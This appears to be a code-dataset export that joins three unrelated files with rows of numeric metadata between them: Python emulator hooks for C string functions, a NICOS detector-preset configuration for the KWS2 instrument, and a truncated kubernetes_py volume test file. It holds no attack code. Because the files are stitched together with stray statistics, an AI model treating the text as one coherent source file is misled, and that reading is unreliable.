        eh.writeEmuMem(argv[0], fill * count)
    else:
        logging.debug("dest memory not large enough @%s" % eh.hexString(address))
    eh.uc.reg_write(eh.regs["ret"], argv[0])
def _bzeroHook(eh, address, argv, funcName, userData):
    """Emulates bzero: zero-fills argv[1] bytes at argv[0] and writes the
    destination pointer to the return register.

    Fix: both debug messages said "memset" (copy/paste from _memsetHook);
    they now correctly name bzero.
    """
    setSize = eh._checkMemSize(argv[1], userData)
    dstRegion = eh.getEmuMemRegion(argv[0])
    src = b"\x00"
    if dstRegion is None:
        logging.debug("dest memory does not exist for bzero @%s" % eh.hexString(address))
        dstRegion = eh.getEmuMemRegion(eh.allocEmuMem(setSize))
        argv[0] = dstRegion[0]
    if setSize <= dstRegion[1] - argv[0]:
        eh.writeEmuMem(argv[0], src * setSize)
    else:
        logging.debug("dest memory not large enough @%s" % eh.hexString(address))
    eh.uc.reg_write(eh.regs["ret"], argv[0])
def _strcatHook(eh, address, argv, funcName, userData):
    """Emulates strcat: appends the NUL-terminated source string to the
    destination string and writes the destination pointer to the return
    register, or 0 on failure."""
    if eh.isValidEmuPtr(argv[1]):
        tail = eh.getEmuString(argv[1]) + b"\x00"
        region = eh.getEmuMemRegion(argv[0])
        if region is None:
            # destination is unmapped: back it with a fresh allocation
            logging.debug("dest memory does not exist for strcat @%s" % eh.hexString(address))
            region = eh.getEmuMemRegion(eh.allocEmuMem(len(tail) + 1))
            argv[0] = region[0]
        head = eh.getEmuString(argv[0])
        if len(head) + len(tail) <= region[1] - argv[0]:
            eh.writeEmuMem(argv[0], head + tail)
            eh.uc.reg_write(eh.regs["ret"], argv[0])
            return
    eh.uc.reg_write(eh.regs["ret"], 0)
def _strncatHook(eh, address, argv, funcName, userData):
    """Emulates strncat: appends at most argv[2] bytes of the source string
    plus a NUL terminator to the destination; writes the destination
    pointer to the return register, or 0 on failure."""
    if eh.isValidEmuPtr(argv[1]):
        count = eh._checkMemSize(argv[2], userData)
        tail = eh.getEmuString(argv[1])
        count = min(count, len(tail))
        region = eh.getEmuMemRegion(argv[0])
        if region is None:
            # destination is unmapped: back it with a fresh allocation
            logging.debug("dest memory does not exist for strncat @%s" % eh.hexString(address))
            region = eh.getEmuMemRegion(eh.allocEmuMem(count + 1))
            argv[0] = region[0]
        head = eh.getEmuString(argv[0])
        if len(head) + count + 1 <= region[1] - argv[0]:
            eh.writeEmuMem(argv[0], head + tail[:count] + b"\x00")
            eh.uc.reg_write(eh.regs["ret"], argv[0])
            return
    eh.uc.reg_write(eh.regs["ret"], 0)
def _wcscatHook(eh, address, argv, funcName, userData):
    """Emulates wcscat: appends the wide source string plus its 2-byte NUL
    terminator to the destination wide string; writes the destination
    pointer to the return register, or 0 on failure."""
    if eh.isValidEmuPtr(argv[1]):
        tail = eh.getEmuWideString(argv[1]) + b"\x00\x00"
        region = eh.getEmuMemRegion(argv[0])
        if region is None:
            # destination is unmapped: back it with a fresh allocation
            logging.debug("dest memory does not exist for wcscat @%s" % eh.hexString(address))
            region = eh.getEmuMemRegion(eh.allocEmuMem(len(tail)))
            argv[0] = region[0]
        head = eh.getEmuWideString(argv[0])
        if len(head) + len(tail) <= region[1] - argv[0]:
            eh.writeEmuMem(argv[0], head + tail)
            eh.uc.reg_write(eh.regs["ret"], argv[0])
            return
    eh.uc.reg_write(eh.regs["ret"], 0)
def _wcsncatHook(eh, address, argv, funcName, userData):
    """Emulates wcsncat: appends at most argv[2] wide characters of the
    source plus a 2-byte NUL to the destination wide string; writes the
    destination pointer to the return register, or 0 on failure."""
    if eh.isValidEmuPtr(argv[1]):
        count = eh._checkMemSize(argv[2], userData)
        tail = eh.getEmuWideString(argv[1])
        # convert the character count to bytes, capped at the source length
        count = min(count * 2, len(tail))
        region = eh.getEmuMemRegion(argv[0])
        if region is None:
            logging.debug("dest memory does not exist for wcsncat @%s" % eh.hexString(address))
            region = eh.getEmuMemRegion(eh.allocEmuMem(count + 2))
            argv[0] = region[0]
        head = eh.getEmuWideString(argv[0])
        if len(head) + count + 2 <= region[1] - argv[0]:
            eh.writeEmuMem(argv[0], head + tail[:count] + b"\x00\x00")
            eh.uc.reg_write(eh.regs["ret"], argv[0])
            return
    eh.uc.reg_write(eh.regs["ret"], 0)
def _strchrHook(eh, address, argv, funcName, userData):
    """Emulates strchr: writes the address of the first occurrence of the
    character argv[1] in the string at argv[0], or 0 when absent or the
    pointer is invalid."""
    if eh.isValidEmuPtr(argv[0]):
        haystack = eh.getEmuString(argv[0]).decode("latin1")
        pos = haystack.find(chr(argv[1] & 0xFF))
        if pos >= 0:
            eh.uc.reg_write(eh.regs["ret"], argv[0] + pos)
            return
    eh.uc.reg_write(eh.regs["ret"], 0)
def _wcschrHook(eh, address, argv, funcName, userData):
    """Emulates wcschr: writes the address of the first occurrence of the
    wide character argv[1] in the wide string at argv[0], or 0 if not
    found.

    Bug fix: the needle was masked with 0xFF, truncating any wide
    character above U+00FF; wchar_t here is 16 bits (UTF-16LE decode
    above), so mask with 0xFFFF.
    """
    if eh.isValidEmuPtr(argv[0]):
        s = eh.getEmuWideString(argv[0]).decode("utf-16le")
        idx = s.find(chr(argv[1] & 0xFFFF))
        if idx != -1:
            # scale the character index back to a byte offset (2 bytes/char)
            eh.uc.reg_write(eh.regs["ret"], argv[0] + idx * 2)
            return
    eh.uc.reg_write(eh.regs["ret"], 0)
def _strrchrHook(eh, address, argv, funcName, userData):
    """Emulates strrchr: writes the address of the LAST occurrence of the
    character argv[1] in the string at argv[0], or 0 when absent or the
    pointer is invalid."""
    if eh.isValidEmuPtr(argv[0]):
        haystack = eh.getEmuString(argv[0]).decode("latin1")
        pos = haystack.rfind(chr(argv[1] & 0xFF))
        if pos >= 0:
            eh.uc.reg_write(eh.regs["ret"], argv[0] + pos)
            return
    eh.uc.reg_write(eh.regs["ret"], 0)
def _wcsrchrHook(eh, address, argv, funcName, userData):
    """Emulates wcsrchr: writes the address of the LAST occurrence of the
    wide character argv[1] in the wide string at argv[0], or 0 if not
    found.

    Bug fix: the needle was masked with 0xFF, truncating any wide
    character above U+00FF; wchar_t here is 16 bits (UTF-16LE decode
    above), so mask with 0xFFFF.
    """
    if eh.isValidEmuPtr(argv[0]):
        s = eh.getEmuWideString(argv[0]).decode("utf-16le")
        idx = s.rfind(chr(argv[1] & 0xFFFF))
        if idx != -1:
            # scale the character index back to a byte offset (2 bytes/char)
            eh.uc.reg_write(eh.regs["ret"], argv[0] + idx * 2)
            return
    eh.uc.reg_write(eh.regs["ret"], 0)
def _strlwrHook(eh, address, argv, funcName, userData):
    """Emulates _strlwr: lower-cases the string at argv[0] in place and
    writes its address to the return register, or 0 for a bad pointer."""
    if eh.isValidEmuPtr(argv[0]):
        text = eh.getEmuString(argv[0]).decode("latin1")
        eh.writeEmuMem(argv[0], text.lower().encode("latin1"))
        eh.uc.reg_write(eh.regs["ret"], argv[0])
        return
    eh.uc.reg_write(eh.regs["ret"], 0)
def _struprHook(eh, address, argv, funcName, userData):
    """Emulates _strupr: upper-cases the string at argv[0] in place and
    writes its address to the return register, or 0 for a bad pointer."""
    if eh.isValidEmuPtr(argv[0]):
        text = eh.getEmuString(argv[0]).decode("latin1")
        eh.writeEmuMem(argv[0], text.upper().encode("latin1"))
        eh.uc.reg_write(eh.regs["ret"], argv[0])
        return
    eh.uc.reg_write(eh.regs["ret"], 0)
def _wcslwrHook(eh, address, argv, funcName, userData):
    """Emulates _wcslwr: lower-cases the wide string at argv[0] in place
    and writes its address to the return register, or 0 for a bad
    pointer."""
    if eh.isValidEmuPtr(argv[0]):
        text = eh.getEmuWideString(argv[0]).decode("utf-16le")
        eh.writeEmuMem(argv[0], text.lower().encode("utf-16le"))
        eh.uc.reg_write(eh.regs["ret"], argv[0])
        return
    eh.uc.reg_write(eh.regs["ret"], 0)
def _wcsuprHook(eh, address, argv, funcName, userData):
    """Emulates _wcsupr: upper-cases the wide string at argv[0] in place
    and writes its address to the return register, or 0 for a bad
    pointer."""
    if eh.isValidEmuPtr(argv[0]):
        text = eh.getEmuWideString(argv[0]).decode("utf-16le")
        eh.writeEmuMem(argv[0], text.upper().encode("utf-16le"))
        eh.uc.reg_write(eh.regs["ret"], argv[0])
        return
    eh.uc.reg_write(eh.regs["ret"], 0)
def _strdupHook(eh, address, argv, funcName, userData):
    """Emulates strdup: copies the string at argv[0] into newly allocated
    emulator memory and writes the new address to the return register, or
    0 for a bad pointer."""
    if eh.isValidEmuPtr(argv[0]):
        data = eh.getEmuString(argv[0])
        # +1 leaves room for the NUL terminator in the new allocation
        copyAddr = eh.allocEmuMem(len(data) + 1)
        eh.writeEmuMem(copyAddr, data)
        eh.uc.reg_write(eh.regs["ret"], copyAddr)
        return
    eh.uc.reg_write(eh.regs["ret"], 0)
def _wcsdupHook(eh, address, argv, funcName, userData):
    """Emulates _wcsdup: copies the wide string at argv[0] into newly
    allocated emulator memory and writes the new address to the return
    register, or 0 for a bad pointer."""
    if eh.isValidEmuPtr(argv[0]):
        data = eh.getEmuWideString(argv[0])
        # +2 leaves room for the 2-byte wide NUL terminator
        copyAddr = eh.allocEmuMem(len(data) + 2)
        eh.writeEmuMem(copyAddr, data)
        eh.uc.reg_write(eh.regs["ret"], copyAddr)
        return
    eh.uc.reg_write(eh.regs["ret"], 0)
def _modHook(eh, address, argv, funcName, userData):
    """Emulates a modulus helper: writes argv[0] % argv[1] to the return
    register.

    Bug fix: a zero divisor previously raised ZeroDivisionError inside the
    hook and aborted emulation; it is now guarded and reported as 0.
    """
    if argv[1] == 0:
        logging.debug("modulus by zero @%s" % eh.hexString(address))
        eh.uc.reg_write(eh.regs["ret"], 0)
        return
    eh.uc.reg_write(eh.regs["ret"], argv[0] % argv[1])
| 40.422497
| 103
| 0.582191
| 3,724
| 29,468
| 4.551826
| 0.053706
| 0.043655
| 0.040057
| 0.068669
| 0.915167
| 0.894814
| 0.875288
| 0.857884
| 0.836588
| 0.818595
| 0
| 0.028109
| 0.274433
| 29,468
| 729
| 104
| 40.422497
| 0.764698
| 0.008212
| 0
| 0.758242
| 0
| 0
| 0.069245
| 0
| 0
| 0
| 0.015162
| 0
| 0
| 1
| 0.083203
| false
| 0
| 0.00157
| 0
| 0.145997
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
67076f22bfb35cff7254b91a7f8ef5ebe6135686
| 8,674
|
py
|
Python
|
nicos_mlz/kws2/setups/config_detector.py
|
jkrueger1/nicos
|
5f4ce66c312dedd78995f9d91e8a6e3c891b262b
|
[
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 12
|
2019-11-06T15:40:36.000Z
|
2022-01-01T16:23:00.000Z
|
nicos_mlz/kws2/setups/config_detector.py
|
jkrueger1/nicos
|
5f4ce66c312dedd78995f9d91e8a6e3c891b262b
|
[
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 91
|
2020-08-18T09:20:26.000Z
|
2022-02-01T11:07:14.000Z
|
nicos_mlz/kws2/setups/config_detector.py
|
jkrueger1/nicos
|
5f4ce66c312dedd78995f9d91e8a6e3c891b262b
|
[
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 6
|
2020-01-11T10:52:30.000Z
|
2022-02-25T12:35:23.000Z
|
description = 'presets for the detector position'
group = 'configdata'
# Assigns presets for the detector z position and x/y displacement of the
# beamstop for each selector preset.
#
# When you add a new detector z position, make sure to add a real offset as
# well in the DETECTOR_OFFSETS table below.
DETECTOR_PRESETS = {
'2.9A tilt': {
'1.5m': dict(z=1.5, x=1.0, y=520.0),
'1.5m DB': dict(z=1.5, x=2.0, y=500.0, attenuator='in'),
'2m': dict(z=2, x=1.0, y=521.5),
# '2m DB': dict(z=2, x=13.0, y=500.0, attenuator='in'),
'4m': dict(z=4, x=3.0, y=521.5),
'8m': dict(z=8, x=2.5, y=520.5),
# '8m DB': dict(z=8, x=13.0, y=500.0, attenuator='in'),
# '20m DB': dict(z=19.9, x=13.0, y=500.0, attenuator='in'),
# '20m': dict(z=19.9, x=21.0, y=586.0),
# 'Small': dict(det='small', x=0.0, y=711.4),
},
# '3.95A tilt': {
# '1.5m': dict(z=1.5, x=18.8, y=596.8),
# '1.5m DB': dict(z=1.5, x=18.8, y=500.0, attenuator='in'),
# '2m': dict(z=2, x=18.8, y=597.8),
# '4m': dict(z=4, x=19.5, y=597.5),
# '6m': dict(z=6, x=16.0, y=603.6),
# '8m': dict(z=8, x=21.5, y=594.0),
# '8m DB': dict(z=8, x=13.0, y=500.0, attenuator='in'),
# '8m att': dict(z=8, x=13.0, y=500.0),
# '20m': dict(z=19.9, x=20.0, y=586.0),
# 'Small': dict(det='small', x=0.0, y=711.4),
# },
'4.66A': {
'1.5m': dict(z=1.5, x=1.0, y=520),
'1.5m DB': dict(z=1.5, x=2.0, y=500.0, attenuator='in'),
'2m': dict(z=2, x=1, y=521.5),
'4m': dict(z=4, x=3, y=521.5),
'8m DB': dict(z=8, x=3.0, y=500.0, attenuator='in'),
'8m': dict(z=8, x=2.5, y=520.5),
'14m': dict(z=14, x=3.0, y=517),
'20m': dict(z=19.9, x=3.0, y=513.5),
'Small': dict(det='small', x=0.0, y=711.4),
##########################################################################
############################# ACHTUNG ####################################
# New beamstop values measured on 03.05.2017 for 2, 4, 8, and 20m at 5 A
# wavelength
##########################################################################
##########################################################################
},
# '4.66A tilt': {
# '1.5m': dict(z=1.5, x=18.8, y=596.8),
# '1.5m DB': dict(z=1.5, x=18.8, y=500.0, attenuator='in'),
# '2m': dict(z=2, x=18.8, y=597.8),
# '4m': dict(z=4, x=19.5, y=597.5),
# '8m DB': dict(z=8, x=13.0, y=500.0, attenuator='in'),
# '8m': dict(z=8, x=17.0, y=621),
# '20m': dict(z=19.9, x=20.0, y=586.0),
# 'Small': dict(det='small', x=0.0, y=711.4),
# },
'5A': {
'1.5m': dict(z=1.5, x=1.0, y=520),
'1.5m DB': dict(z=1.5, x=2.0, y=620.0, attenuator='in'),
'2m': dict(z=2, x=1.0, y=521.5),
'4m': dict(z=4, x=3, y=521.5),
# '6m': dict(z=6, x=16.0, y=603.6),
'8m': dict(z=8, x=1.5, y=520.5),
#x=21.5, y=594.0),
'8m DB': dict(z=8, x=2.0, y=620.0, attenuator='in'),
# '8m att': dict(z=8, x=13.0, y=500.0),
'20m': dict(z=19.9, x=3.0, y=512),
# '20ms': dict(z=19.9, x=21.0, y=400.0),
'20m DB': dict(z=19.9, x=2.0, y=620.0, attenuator='in'),
'Small': dict(det='small', x=0.0, y=711.4),
},
'5A tilt': {
'1.5m': dict(z=1.5, x=19.0, y=596.5),
'2m': dict(z=2, x=1.0, y=521.5),
'2m DB': dict(z=2, x=13.0, y=500.0, attenuator='in'),
'4m': dict(z=4, x=13.7, y=617.0),
'6m': dict(z=6, x=16.0, y=603.6),
'8m': dict(z=8, x=1.5, y=520.5),
'8m DB': dict(z=8, x=13.0, y=500.0, attenuator='in'),
'8m att': dict(z=8, x=13.0, y=500.0),
'20m': dict(z=19.9, x=3.0, y=512.0),
'Small': dict(det='small', x=0.0, y=711.4),
},
# '6A tilt': {
# '1.5m': dict(z=1.5, x=19.0, y=596.5),
# '1.5m DB': dict(z=1.5, x=18.8, y=500.0, attenuator='in'),
# '2m': dict(z=2, x=18.8, y=597.8),
# '4m': dict(z=4, x=19.5, y=597.5),
# '6m': dict(z=6, x=16.0, y=603.6),
# '8m': dict(z=8, x=21.5, y=594.0),
# '8m DB': dict(z=8, x=13.0, y=500.0, attenuator='in'),
# '8m att': dict(z=8, x=13.0, y=500.0),
# '20m': dict(z=19.9, x=20.0, y=586.5),
# 'Small': dict(det='small', x=0.0, y=711.4),
# },
# '6A': {
# '1.5m DB': dict(z=1.5, x=18.8, y=500.0, attenuator='in'),
# '2m': dict(z=2, x=13.0, y=597.8),
# '8m DB': dict(z=8, x=13.0, y=500.0, attenuator='in'),
# 'Small': dict(det='small', x=0.0, y=711.4),
# },
'7A': {
'1.5m': dict(z=1.5, x=1.0, y=520.5),
'1.5m DB': dict(z=1.5, x=1.0, y=500.0, attenuator='in'),
'2m': dict(z=2, x=1.0, y=521.5),
# '2m DB': dict(z=2, x=16.9, y=500.0, attenuator='in'),
'4m': dict(z=4, x=2.5, y=521.0),
'8m': dict(z=8, x=1.5, y=520.5),
# '8m DB': dict(z=8, x=13.0, y=500.0, attenuator='in'),
'8m DB': dict(z=8, x=1.5, y=300.0, attenuator='in'),
'20m DB': dict(z=19.9, x=1.0, y=300.0, attenuator='in'),
'20m': dict(z=19.9, x=1.0, y=507.5),
'Small': dict(det='small', x=-40.0, y=785.0),
},
'7A tilt': {
'1.5m': dict(z=1.5, x=18.8, y=596.8),
'1.5m DB': dict(z=1.5, x=18.8, y=500.0, attenuator='in'),
'2m': dict(z=2, x=18.8, y=597.9),
'2m DB': dict(z=2, x=16.9, y=500.0, attenuator='in'),
'4m': dict(z=4, x=20.3, y=597.5),
'8m': dict(z=8, x=20.9, y=592.5),
'8m DB': dict(z=8, x=20.9, y=500.0, attenuator='in'),
'20m': dict(z=19.9, x=15.0, y=581.2),
'Small': dict(det='small', x=-40.0, y=785),
},
# '8A': {
# '1.5m': dict(z=1.5, x=18.8, y=500.0),
# '1.5m DB': dict(z=1.5, x=18.8, y=500.0, attenuator='in'),
# '2m': dict(z=2, x=18.8, y=597.8),
# '8m DB': dict(z=8, x=13.0, y=500.0, attenuator='in'),
# '8m': dict(z=8, x=2.5, y=610.0),
# '20m': dict(z=19.9, x=1.0, y=610.0),
# 'Small': dict(det='small', x=0.0, y=711.4),
# },
# '9A': {
# '1.5m': dict(z=1.5, x=18.8, y=500.0),
# '1.5m DB': dict(z=1.5, x=18.8, y=500.0, attenuator='in'),
# '2m': dict(z=2, x=18.8, y=597.8),
# '4m': dict(z=4, x=16.3, y=604.0),
# '8m DB': dict(z=8 , x=13.0, y=500.0, attenuator='in'),
# 'Small': dict(det='small', x=0.0, y=711.4),
# only 8m and 20 m have been updated at lambda = 10 A
# },
'10A': {
'1.5m': dict(z=1.5, x=1.0, y=521.0),
'1.5m DB': dict(z=1.5, x=1.0, y=521.0, attenuator='in'),
'2m': dict(z=2, x=1.0, y=521.5),
'4m': dict(z=4, x=1.5, y=519.0),
'8m': dict(z=8, x=3.0, y=516.0),
'8m DB': dict(z=8, x=4.0, y=620.0, attenuator='in'),
'20m': dict(z=19.9, x=4.0, y=493.5),
'20m DB': dict(z=19.9, x=4.0, y=300.0),
'Small': dict(det='small', x=0.0, y=711.4),
},
# '11.3A': {
# '2m': dict(z=2, x=18.8, y=597.8),
# '8m DB': dict(z=8, x=13.0, y=500.0, attenuator='in'),
# '4m': dict(z=4, x=16.3, y=604.0),
# '8m': dict(z=8, x=16.3, y=600.0),
# '8m DB': dict(z=8, x=13.0, y=500.0, attenuator='in'),
# '20m': dict(z=19.9, x=21.5, y=567.2),
# 'Small': dict(det='small', x=0.0, y=711.4),
# },
'19A': {
'2m': dict(z=2, x=1.0, y=597.8),
'20m': dict(z=19.9, x=1.0, y=620.0),
'8m': dict(z=8, x=1.0, y=500.0),
'Small': dict(det='small', x=0.0, y=711.4),
},
}
SMALL_DET_POSITION = 17.0
# This offset is added to 20m + det_z to get the chopper-detector length
# for time-of-flight mode calculation.
#
# It varies with detector distance because the det_z value is not actually
# particularly accurate.
DETECTOR_OFFSETS = {
1.5: 0.7,
2: 0.7,
2.1: 0.7,
4: 0.7,
4.1: 0.7,
6: 0.7,
8: 0.7,
8.1: 0.7,
14: 0.7,
17.0: 0.7, # for small detector
19.9: 0.7,
}
| 43.808081
| 75
| 0.404888
| 1,625
| 8,674
| 2.156923
| 0.089231
| 0.158345
| 0.071897
| 0.065906
| 0.782311
| 0.782311
| 0.77204
| 0.742368
| 0.724394
| 0.681598
| 0
| 0.209177
| 0.316578
| 8,674
| 197
| 76
| 44.030457
| 0.382085
| 0.482476
| 0
| 0.214286
| 0
| 0
| 0.094647
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6711785f890fbe18b6c11ee453a0d098fee791ae
| 35,288
|
py
|
Python
|
tests/test_k8s_volume.py
|
Unacademy/kubernetes-py
|
ad6150c2e27369590dc7a7330fe296bc45755cff
|
[
"Apache-2.0"
] | null | null | null |
tests/test_k8s_volume.py
|
Unacademy/kubernetes-py
|
ad6150c2e27369590dc7a7330fe296bc45755cff
|
[
"Apache-2.0"
] | null | null | null |
tests/test_k8s_volume.py
|
Unacademy/kubernetes-py
|
ad6150c2e27369590dc7a7330fe296bc45755cff
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is subject to the terms and conditions defined in
# file 'LICENSE.md', which is part of this source code package.
#
import uuid
from tests import _utils
from tests.BaseTest import BaseTest
from kubernetes_py.K8sExceptions import TimedOutException
from kubernetes_py.K8sPod import K8sPod
from kubernetes_py.K8sReplicationController import K8sReplicationController
from kubernetes_py.K8sVolume import K8sVolume
from kubernetes_py.K8sVolumeMount import K8sVolumeMount
from kubernetes_py.models.v1.AWSElasticBlockStoreVolumeSource import AWSElasticBlockStoreVolumeSource
from kubernetes_py.models.v1.EmptyDirVolumeSource import EmptyDirVolumeSource
from kubernetes_py.models.v1.GCEPersistentDiskVolumeSource import GCEPersistentDiskVolumeSource
from kubernetes_py.models.v1.GitRepoVolumeSource import GitRepoVolumeSource
from kubernetes_py.models.v1.HostPathVolumeSource import HostPathVolumeSource
from kubernetes_py.models.v1.NFSVolumeSource import NFSVolumeSource
from kubernetes_py.models.v1.SecretVolumeSource import SecretVolumeSource
from kubernetes_py.models.v1.ConfigMapVolumeSource import ConfigMapVolumeSource
class K8sVolumeTest(BaseTest):
def setUp(self):
_utils.cleanup_nodes()
_utils.cleanup_rc()
_utils.cleanup_pods()
_utils.cleanup_secrets()
K8sPod.POD_READY_TIMEOUT_SECONDS = 40
K8sReplicationController.SCALE_WAIT_TIMEOUT_SECONDS = 40
pass
def tearDown(self):
_utils.cleanup_nodes()
_utils.cleanup_rc()
_utils.cleanup_pods()
_utils.cleanup_secrets()
pass
# --------------------------------------------------------------------------------- init
def test_init_no_args(self):
with self.assertRaises(SyntaxError):
K8sVolume()
def test_init_invalid_name(self):
name = object()
with self.assertRaises(SyntaxError):
K8sVolume(name=name)
def test_init_invalid_type(self):
name = "yoname"
type = object()
with self.assertRaises(SyntaxError):
K8sVolume(name=name, type=type)
# --------------------------------------------------------------------------------- emptyDir
def test_init_empty_dir(self):
name = "yoname"
type = 'emptyDir'
vol = K8sVolume(name=name, type=type)
self.assertIsNotNone(vol)
self.assertIsInstance(vol, K8sVolume)
self.assertEqual(type, vol.type)
self.assertIsInstance(vol.source, EmptyDirVolumeSource)
def test_emptydir_set_medium_invalid_type(self):
name = "yoname"
type = "hostPath"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(NotImplementedError):
vol.medium = None
def test_emptydir_set_medium_invalid(self):
name = "yoname"
type = "emptyDir"
medium = "yomedium"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.medium = medium
def test_emptydir_set_medium_none(self):
name = "yoname"
type = "emptyDir"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.medium = None
def test_emptydir_set_medium_emptystring(self):
name = "yoname"
type = "emptyDir"
vol = K8sVolume(name=name, type=type)
vol.medium = ''
self.assertEqual('', vol.medium)
def test_emptydir_set_medium_memory(self):
name = "yoname"
type = "emptyDir"
medium = "Memory"
vol = K8sVolume(name=name, type=type)
vol.medium = medium
self.assertEqual(medium, vol.medium)
# --------------------------------------------------------------------------------- hostPath
def test_init_host_path(self):
name = "yoname"
type = 'hostPath'
vol = K8sVolume(name=name, type=type)
self.assertIsNotNone(vol)
self.assertIsInstance(vol, K8sVolume)
self.assertEqual('hostPath', vol.type)
self.assertIsInstance(vol.source, HostPathVolumeSource)
def test_hostpath_set_path_invalid_type(self):
name = "yoname"
type = "emptyDir"
host_path = "/path/on/host"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(NotImplementedError):
vol.path = host_path
def test_hostpath_set_path_none(self):
name = "yoname"
type = "hostPath"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.path = None
def test_hostpath_set_path(self):
name = "yoname"
type = "hostPath"
host_path = "/path/on/host"
vol = K8sVolume(name=name, type=type)
vol.path = host_path
self.assertEqual(host_path, vol.path)
# --------------------------------------------------------------------------------- secret
def test_init_secret(self):
name = "yoname"
type = "secret"
vol = K8sVolume(name=name, type=type)
self.assertIsNotNone(vol)
self.assertIsInstance(vol, K8sVolume)
self.assertEqual(type, vol.type)
self.assertIsInstance(vol.source, SecretVolumeSource)
def test_secret_set_name_invalid_type(self):
name = "yoname"
type = "emptyDir"
secret_name = "yosecret"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(NotImplementedError):
vol.secret_name = secret_name
def test_secret_set_name_invalid_obj(self):
name = "yoname"
type = "secret"
secret = object()
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.secret_name = secret
def test_secret_set_name(self):
name = "yoname"
type = "secret"
secret_name = "yosecret"
vol = K8sVolume(name=name, type=type)
vol.secret_name = secret_name
self.assertEqual(vol.secret_name, secret_name)
# --------------------------------------------------------------------------------- configMap
def test_init_config_map(self):
name = "yoname"
type = 'configMap'
vol = K8sVolume(name=name, type=type)
self.assertIsNotNone(vol)
self.assertIsInstance(vol, K8sVolume)
self.assertEqual('configMap', vol.type)
self.assertIsInstance(vol.source, ConfigMapVolumeSource)
def test_configmap_set_items(self):
name = "yoname"
type = "configMap"
items = list()
items.append({
"key": "testkey",
"path": "testpath"
})
vol = K8sVolume(name=name, type=type)
vol.configmap_items = items
serialized_items = vol.serialize().get('configMap').get('items')
self.assertEqual(items, serialized_items)
# --------------------------------------------------------------------------------- awsElasticBlockStore
def test_aws_init(self):
name = "yoname"
type = "awsElasticBlockStore"
vol = K8sVolume(name=name, type=type)
self.assertIsNotNone(vol)
self.assertIsInstance(vol, K8sVolume)
self.assertEqual(type, vol.type)
self.assertIsInstance(vol.source, AWSElasticBlockStoreVolumeSource)
def test_aws_set_volume_id_invalid_obj(self):
name = "yoname"
type = "awsElasticBlockStore"
volume_id = object()
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.volume_id = volume_id
def test_aws_set_volume_id_none(self):
name = "yoname"
type = "awsElasticBlockStore"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.volume_id = None
def test_aws_set_volume_id_invalid_type(self):
name = "yoname"
type = "emptyDir"
volume_id = "vol-0a89c9040d544a371"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(NotImplementedError):
vol.volume_id = volume_id
def test_aws_set_volume_id(self):
name = "yoname"
type = "awsElasticBlockStore"
volume_id = "vol-0a89c9040d544a371"
vol = K8sVolume(name=name, type=type)
vol.volume_id = volume_id
self.assertEqual(vol.volume_id, volume_id)
# --------------------------------------------------------------------------------- gcePersistentDisk
def test_gce_init(self):
name = "yoname"
type = "gcePersistentDisk"
vol = K8sVolume(name=name, type=type)
self.assertIsNotNone(vol)
self.assertIsInstance(vol, K8sVolume)
self.assertEqual(type, vol.type)
self.assertIsInstance(vol.source, GCEPersistentDiskVolumeSource)
def test_gce_set_pd_name_none(self):
name = "yoname"
type = "gcePersistentDisk"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.pd_name = None
def test_gce_set_pd_name_invalid_obj(self):
name = "yoname"
type = "gcePersistentDisk"
pd_name = object()
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.pd_name = pd_name
def test_gce_set_pd_name_invalid_type(self):
name = "yoname"
type = "emptyDir"
pd_name = "yopdname"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(NotImplementedError):
vol.pd_name = pd_name
def test_gce_set_pd_name(self):
name = "yoname"
type = "gcePersistentDisk"
pd_name = "vol-0a89c9040d544a371"
vol = K8sVolume(name=name, type=type)
vol.pd_name = pd_name
self.assertEqual(vol.pd_name, pd_name)
# --------------------------------------------------------------------------------- AWS & GCE - fs_type
def test_aws_set_fs_type_none(self):
name = "yoname"
type = "awsElasticBlockStore"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.fs_type = None
def test_gce_set_fs_type_none(self):
name = "yoname"
type = "gcePersistentDisk"
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.fs_type = None
def test_aws_fs_type_invalid_obj(self):
name = "yoname"
type = "awsElasticBlockStore"
fs_type = object()
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.fs_type = fs_type
def test_gce_fs_type_invalid_obj(self):
name = "yoname"
type = "gcePersistentDisk"
fs_type = object()
vol = K8sVolume(name=name, type=type)
with self.assertRaises(SyntaxError):
vol.fs_type = fs_type
def test_fs_type_invalid_type(self):
name = "yoname"
type = "emptyDir"
fs_type = object()
vol = K8sVolume(name=name, type=type)
with self.assertRaises(NotImplementedError):
vol.fs_type = fs_type
def test_aws_set_fs_type(self):
name = "yoname"
type = "awsElasticBlockStore"
